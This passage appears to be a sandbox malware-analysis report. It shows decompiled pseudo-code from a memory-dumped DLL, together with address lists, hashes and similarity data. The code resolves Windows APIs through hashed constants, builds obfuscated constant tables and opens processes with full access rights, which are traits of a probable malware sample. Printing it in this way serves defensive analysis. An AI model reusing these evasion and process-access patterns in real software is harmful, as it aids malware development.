				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v92, E6EC6F4CC(_t329) + 0x10);
				E6EC6F4BC( &_v96, E6EC6F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v100, E6EC6F4CC(_t333) + 0x10);
				E6EC6F4BC( &_v104, E6EC6F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v108, E6EC6F4CC(_t337) + 0x10);
				E6EC6F4BC( &_v112, E6EC6F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v116, E6EC6F4CC(_t341) + 0x10);
				E6EC6F4BC( &_v120, E6EC6F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v124, E6EC6F4CC(_t345) + 0x10);
				E6EC6F4BC( &_v128, E6EC6F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v132, E6EC6F4CC(_t349) + 0x10);
				E6EC6F4BC( &_v136, E6EC6F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v140, E6EC6F4CC(_t353) + 0x10);
				E6EC6F4BC( &_v144, E6EC6F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v148, E6EC6F4CC(_t357) + 0x10);
				E6EC6F4BC( &_v152, E6EC6F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v156, E6EC6F4CC(_t361) + 0x10);
				E6EC6F4BC( &_v160, E6EC6F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v164, E6EC6F4CC(_t365) + 0x10);
				E6EC6F4BC( &_v168, E6EC6F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v172, E6EC6F4CC(_t369) + 0x10);
				E6EC6F4BC( &_v176, E6EC6F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v180, E6EC6F4CC(_t373) + 0x10);
				E6EC6F4BC( &_v184, E6EC6F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v188, E6EC6F4CC(_t377) + 0x10);
				E6EC6F4BC( &_v192, E6EC6F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v196, E6EC6F4CC(_t381) + 0x10);
				E6EC6F4BC( &_v200, E6EC6F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v204, E6EC6F4CC(_t385) + 0x10);
				E6EC6F4BC( &_v208, E6EC6F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6EC74200(0x60a28c5c, _t434);
				E6EC6F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6EC6F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6EC6F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6EC6F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6EC6F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6EC6F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6EC6F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6EC6F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6EC6F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6EC6F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6EC6F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6EC6F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6EC6F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6EC6F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6EC6F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6EC6F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6EC6F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6EC61D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6EC6B27C( &_v248, _v256, _t481, _v252, _t318);
				E6EC6F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v296, E6EC6F4CC(_t410) + 0x10);
				E6EC6F4BC( &_v300, E6EC6F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v304, E6EC6F4CC(_t414) + 0x10);
				E6EC6F4BC( &_v308, E6EC6F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v312, E6EC6F4CC(_t418) + 0x10);
				E6EC6F4BC( &_v316, E6EC6F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6EC6F828( &_v320, E6EC6F4CC(_t422) + 0x10);
				E6EC6F4BC( &_v324, E6EC6F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6EC6B9FC(_t154,  *_t480);
				E6EC6F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6EC6F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6EC6F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6EC6F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6EC6F654( &_v316);
				return E6EC6F654( &_v356);
			}

0x6ec61494
0x6ec61498
0x6ec6149d
0x6ec614a3
0x6ec614ab
0x6ec614b0
0x6ec614bc
0x6ec614c0
0x6ec614d2
0x6ec614e8
0x6ec614f3
0x6ec614f4
0x6ec614f5
0x6ec614f6
0x6ec614f7
0x6ec614fa
0x6ec614fe
0x6ec61502
0x6ec61509
0x6ec6151b
0x6ec61531
0x6ec6153c
0x6ec6153d
0x6ec6153e
0x6ec6153f
0x6ec61540
0x6ec61543
0x6ec61547
0x6ec6154b
0x6ec61552
0x6ec61564
0x6ec6157a
0x6ec61585
0x6ec61586
0x6ec61587
0x6ec61588
0x6ec61589
0x6ec6158c
0x6ec61590
0x6ec61594
0x6ec6159b
0x6ec615ad
0x6ec615c3
0x6ec615ce
0x6ec615cf
0x6ec615d0
0x6ec615d1
0x6ec615d2
0x6ec615d5
0x6ec615d9
0x6ec615dd
0x6ec615e4
0x6ec615f6
0x6ec6160c
0x6ec61617
0x6ec61618
0x6ec61619
0x6ec6161a
0x6ec6161b
0x6ec6161e
0x6ec61622
0x6ec61626
0x6ec6162d
0x6ec6163f
0x6ec61655
0x6ec61660
0x6ec61661
0x6ec61662
0x6ec61663
0x6ec61664
0x6ec61667
0x6ec6166b
0x6ec6166f
0x6ec61676
0x6ec61688
0x6ec6169e
0x6ec616a9
0x6ec616aa
0x6ec616ab
0x6ec616ac
0x6ec616ad
0x6ec616b0
0x6ec616b4
0x6ec616b8
0x6ec616bf
0x6ec616d1
0x6ec616e7
0x6ec616f2
0x6ec616f3
0x6ec616f4
0x6ec616f5
0x6ec616f6
0x6ec616f9
0x6ec616fd
0x6ec61701
0x6ec61708
0x6ec6171a
0x6ec61730
0x6ec6173b
0x6ec6173c
0x6ec6173d
0x6ec6173e
0x6ec6173f
0x6ec61742
0x6ec61746
0x6ec6174a
0x6ec61751
0x6ec61763
0x6ec61779
0x6ec61784
0x6ec61785
0x6ec61786
0x6ec61787
0x6ec61788
0x6ec6178b
0x6ec6178f
0x6ec61793
0x6ec6179a
0x6ec617ac
0x6ec617c2
0x6ec617cd
0x6ec617ce
0x6ec617cf
0x6ec617d0
0x6ec617d1
0x6ec617d4
0x6ec617d8
0x6ec617dc
0x6ec617e3
0x6ec617f5
0x6ec6180b
0x6ec61816
0x6ec61817
0x6ec61818
0x6ec61819
0x6ec6181a
0x6ec6181d
0x6ec61821
0x6ec61825
0x6ec6182c
0x6ec6183e
0x6ec61854
0x6ec6185f
0x6ec61860
0x6ec61861
0x6ec61862
0x6ec61863
0x6ec61866
0x6ec6186a
0x6ec6186e
0x6ec61875
0x6ec61887
0x6ec6189d
0x6ec618a8
0x6ec618a9
0x6ec618aa
0x6ec618ab
0x6ec618ac
0x6ec618af
0x6ec618b3
0x6ec618b7
0x6ec618be
0x6ec618d0
0x6ec618e6
0x6ec618f1
0x6ec618f2
0x6ec618f3
0x6ec618f4
0x6ec618f5
0x6ec618f8
0x6ec618fc
0x6ec61900
0x6ec61907
0x6ec61919
0x6ec6192f
0x6ec6193a
0x6ec6193b
0x6ec6193c
0x6ec6193d
0x6ec6193e
0x6ec61941
0x6ec61945
0x6ec61949
0x6ec61950
0x6ec61962
0x6ec61978
0x6ec61983
0x6ec61984
0x6ec61985
0x6ec61986
0x6ec6198c
0x6ec6198f
0x6ec61991
0x6ec6199c
0x6ec619a3
0x6ec619ac
0x6ec619b4
0x6ec619bb
0x6ec619c4
0x6ec619cc
0x6ec619d3
0x6ec619dc
0x6ec619e4
0x6ec619eb
0x6ec619f4
0x6ec619fc
0x6ec61a03
0x6ec61a0c
0x6ec61a14
0x6ec61a1b
0x6ec61a24
0x6ec61a2c
0x6ec61a36
0x6ec61a3f
0x6ec61a47
0x6ec61a51
0x6ec61a5a
0x6ec61a62
0x6ec61a6c
0x6ec61a75
0x6ec61a7d
0x6ec61a87
0x6ec61a90
0x6ec61a98
0x6ec61aa2
0x6ec61aab
0x6ec61ab3
0x6ec61abd
0x6ec61ac6
0x6ec61ace
0x6ec61ad8
0x6ec61ae1
0x6ec61ae9
0x6ec61af3
0x6ec61afc
0x6ec61b04
0x6ec61b0e
0x6ec61b17
0x6ec61b1f
0x6ec61b26
0x6ec61b2f
0x6ec61b37
0x6ec61b3e
0x6ec61b43
0x6ec61b51
0x6ec61b55
0x6ec61b64
0x6ec61b6d
0x6ec61b72
0x6ec61b79
0x6ec61b7d
0x6ec61b81
0x6ec61b88
0x6ec61b9a
0x6ec61bb0
0x6ec61bbb
0x6ec61bbc
0x6ec61bbd
0x6ec61bbe
0x6ec61bbf
0x6ec61bc2
0x6ec61bc6
0x6ec61bca
0x6ec61bd1
0x6ec61be3
0x6ec61bf9
0x6ec61c04
0x6ec61c05
0x6ec61c06
0x6ec61c07
0x6ec61c08
0x6ec61c0b
0x6ec61c0f
0x6ec61c13
0x6ec61c1a
0x6ec61c2c
0x6ec61c42
0x6ec61c4d
0x6ec61c4e
0x6ec61c4f
0x6ec61c50
0x6ec61c51
0x6ec61c54
0x6ec61c58
0x6ec61c5c
0x6ec61c63
0x6ec61c75
0x6ec61c8b
0x6ec61c96
0x6ec61c97
0x6ec61c98
0x6ec61c99
0x6ec61c9a
0x6ec61c9d
0x6ec61ca0
0x6ec61ca1
0x6ec61ca2
0x6ec61ca9
0x6ec61cac
0x6ec61cb7
0x6ec61cbe
0x6ec61cc7
0x6ec61ccf
0x6ec61cd6
0x6ec61cdf
0x6ec61ce7
0x6ec61cee
0x6ec61cf7
0x6ec61cff
0x6ec61d04
0x6ec61d0d
0x6ec61d15
0x6ec61d2a

Strings

8nsK, xrefs: 6EC61900

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction ID: 7e9d59b76a3193f005e299b2abd5b486c822db86736b5c017af5661aed8edb61
Opcode Fuzzy Hash: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction Fuzzy Hash: CC3297724187469EC715DF60CCD09EF77A4EFA1208F204F1DB9895A1A2FF71E98AC681

Uniqueness

Uniqueness Score: -1.00%

Function 6EC6A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6EC6A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6EC6B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6EC6F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6EC6F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6EC72234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6EC6F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6EC6F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6EC6F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6ec7b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6EC73064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6EC6F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6EC6B5C4(_t439 + 0x34);
											E6EC6B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6EC6B5C4(_t439 + 0x34);
										E6EC6B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6EC6F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6EC6CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6EC6C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6EC6F828(_t439 + 0x14, E6EC6F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6EC6F4BC(_t439 + 0x14, E6EC6F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6EC73064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6EC6F828(_t439 + 0x40, E6EC6F4CC(_t439 + 0x3c) + 4);
											 *(E6EC6F4BC(_t439 + 0x40, E6EC6F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6EC6CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6EC6F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6EC6F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6EC6AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6EC6CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6EC6F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6EC6F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6EC6F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6EC6F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6EC738F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6EC6F828( *((intOrPtr*)(_t439 + 8)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6EC6F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6EC6F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6EC738F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6EC6F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6EC6F828( *((intOrPtr*)(_t439 + 4)), E6EC6F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6EC6F828( *((intOrPtr*)(_t439 + 8)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6EC6F4BC( *((intOrPtr*)(_t439 + 8)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6EC6F828( *((intOrPtr*)(_t439 + 4)), E6EC6F4CC( *_t439) + 4);
								 *(E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), E6EC6F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6EC6F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6EC73064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6EC6F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6EC6F828( *((intOrPtr*)(_t439 + 8)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6EC6F4BC( *((intOrPtr*)(_t439 + 8)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6EC6F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6EC6F828( *((intOrPtr*)(_t439 + 4)), E6EC6F4CC( *_t439) + 4);
										 *(E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), E6EC6F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
